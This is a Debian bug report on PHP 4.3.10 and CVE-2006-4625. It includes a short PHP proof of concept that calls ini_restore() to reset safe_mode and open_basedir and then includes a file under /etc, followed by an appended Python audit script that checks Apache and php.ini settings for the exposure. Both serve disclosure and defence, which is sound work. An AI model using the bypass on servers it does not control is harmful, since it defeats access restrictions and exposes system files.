[php-maint] Bug#424937: libapache2-mod-php4: CVE-2006-4625 not fixed on old stable

Etienne Carriere digits at rez-gif.supelec.fr
Thu May 17 22:03:46 UTC 2007


Package: libapache2-mod-php4
Version: 4:4.3.10-20
Severity: important


I would like to verify if it is still possible to use the ini_restore
bug on our server. I determined that it is still possible:

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwdd");
ini_restore("safe_mode");
ini_restore("open_basedir");
include("/etc/passwdd"); 
?>

gives:

1
/home/webusers/JdR:/usr/share:/tmp
Warning: main(): open_basedir restriction in effect. File(/etc/passwdd)
is not within the allowed path(s): (/home/webusers/JdR:/usr/share:/tmp)
in /home/webusers/JdR/html/test.php on line 4

Warning: main(/etc/passwdd): failed to open stream: Operation not
permitted in /home/webusers/JdR/html/test.php on line 4

Warning: main(): Failed opening '/etc/passwdd' for inclusion
(include_path='.:/usr/share/fpdf:/usr/share/jpgraph/') in
/home/webusers/JdR/html/test.php on line 4

File with the permissions of /etc/passwd 

So I think that this security hole is still real in this 4.3
(and the bug is only corrected in the 4.4.4 version)

-- System Information:
Debian Release: 3.1
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.14.3n
Locale: LANG=fr_FR@euro, LC_CTYPE=fr_FR@euro (charmap=ISO-8859-15)

Versions of packages libapache2-mod-php4 depends on:
ii  apache2-mpm-prefork   2.0.54-5sarge1     traditional model for Apache2
ii  libbz2-1.0            1.0.2-7            high-quality block-sorting file co
ii  libc6                 2.3.2.ds1-22sarge6 GNU C Library: Shared libraries an
ii  libcomerr2            1.37-2sarge1       common error description library
ii  libdb4.2              4.2.52-18          Berkeley v4.2 Database Libraries [
ii  libexpat1             1.95.8-3           XML parsing C library - runtime li
ii  libkrb53              1.3.6-2sarge4      MIT Kerberos runtime libraries
ii  libmagic1             4.12-1sarge1       File type determination library us
ii  libpcre3              4.5-1.2sarge1      Perl 5 Compatible Regular Expressi
ii  libssl0.9.7           0.9.7e-3sarge4     SSL shared libraries
ii  libzzip-0-12          0.12.83-4          library providing read access on Z
ii  mime-support          3.28-1             MIME files 'mime.types' & 'mailcap
ii  php4-common           4:4.3.10-20        Common files for packages built fr
ii  zlib1g                1:1.2.2-4.sarge.2  compression library - runtime

-- no debconf information
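
An added audit sketch, not part of the original report: CVE-2006-4625 lets ini_restore() reset a directive to its php.ini master value, so a safe_mode or open_basedir restriction set only in the Apache configuration is exposed when php.ini holds a weaker value and ini_restore is not listed in disable_functions. The function names and both sample configurations below are constructed for illustration.

```python
import re

GUARDED = ("safe_mode", "open_basedir")
FLAGS = {"on": "1", "true": "1", "yes": "1",
         "off": "", "false": "", "no": "", "0": "", "none": ""}

def master_values(php_ini):
    """Directive -> value from php.ini text (sections and full-line comments skipped)."""
    values = {}
    for line in php_ini.splitlines():
        line = line.strip()
        if "=" in line and not line.startswith((";", "[")):
            key, val = line.split("=", 1)
            values[key.strip().lower()] = val.strip().strip('"')
    return values

def vhost_overrides(apache_conf):
    """Directives set with php_admin_value / php_admin_flag in Apache config."""
    pat = re.compile(r"^\s*php_admin_(?:value|flag)\s+(\S+)\s+(.+?)\s*$", re.I | re.M)
    return {m.group(1).lower(): m.group(2).strip('"') for m in pat.finditer(apache_conf)}

def exposed(php_ini, apache_conf):
    """Return (directive, vhost value, master value) for restrictions that an
    ini_restore() call would replace with a different php.ini master value."""
    master = master_values(php_ini)
    disabled = {f.strip().lower() for f in master.get("disable_functions", "").split(",")}
    if "ini_restore" in disabled:
        return []  # the function cannot be called from scripts at all
    norm = lambda v: FLAGS.get(v.lower(), v)
    return sorted((name, local, master.get(name, ""))
                  for name, local in vhost_overrides(apache_conf).items()
                  if name in GUARDED and norm(local) != norm(master.get(name, "")))

# Constructed sample input: restrictions exist only at the vhost level.
SAMPLE_INI = """[PHP]
; constructed sample
safe_mode = Off
disable_functions =
"""
SAMPLE_VHOST = """<VirtualHost *:80>
    php_admin_flag safe_mode On
    php_admin_value open_basedir "/home/webusers/example:/tmp"
</VirtualHost>
"""

if __name__ == "__main__":
    for name, local, master in exposed(SAMPLE_INI, SAMPLE_VHOST):
        print(f"{name}: vhost={local!r} master={master!r} (restorable)")
```

An empty result means either ini_restore is disabled in php.ini or the master values already match the per-vhost restrictions.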



